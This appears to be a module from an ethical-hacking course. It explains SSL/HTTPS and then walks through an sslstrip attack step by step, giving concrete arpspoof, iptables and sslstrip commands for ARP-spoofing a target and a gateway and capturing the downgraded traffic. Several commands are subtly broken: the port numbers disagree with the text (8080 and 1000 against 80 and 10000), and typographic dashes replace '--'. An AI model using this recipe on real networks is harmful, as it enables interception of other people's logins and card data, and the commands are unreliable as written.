MODULE 6:- Enumeration
What is SSL (secure socket layer)?
SSL analysis (Secure Socket Layer) is a standard security technology which used for establishing an encrypted channel between a server and a client. For example a web server (website) and a browser; or a mail server and a mail client.
SSL allows sensitive information such as credit card numbers, social security numbers, and login credentials to be transmitted securely. Normally, data sent between browsers and web servers is sent in plain text—leaving you vulnerable to eavesdropping. If an attacker is able to intercept (capture) all data being sent over the internet between a browser and a web server they can see and use that information. Http is sent data in plain text over network. https protocol used for establishing scure channel between browser (client) and web server.
More specifically, SSL is a security protocol. Protocols describe how algorithms should be used; in this case, the SSL protocol determines variables of the encryption for both the link and the data being transmitted.
More detail https://www.digicert.com/ssl.htm
Sslstrip is tool used to downgrade HTTPS to HTTP. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, and then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
How does sslstrip work?
First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send attacker all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).
Step 1: Enable port forwarding
echo “1” > /proc/sys/net/ipv4/ip_forward
Step 2: Findout network gateway
Step 3: Spoof MAC address with gateway MAC address using arpspoof
arpspoof -i <interface> -t <targetIP> <gatewayIP>
arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
Open new terminal and run following command
arpspoof -i eth0 -t 192.168.1.1 192.168.1.5
Step 4: Setup iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp –destination-port 8080 -j REDIRECT –to-port <listenPort>
iptables -t nat -A PREROUTING -p tcp –destination-port 8080 -j REDIRECT –to-port 1000
Step 5: Write the results to a file (-w sslstrip.log), listening on port 1000 (-l 1000):
Sslstrip –w sslstrip.txt –l 1000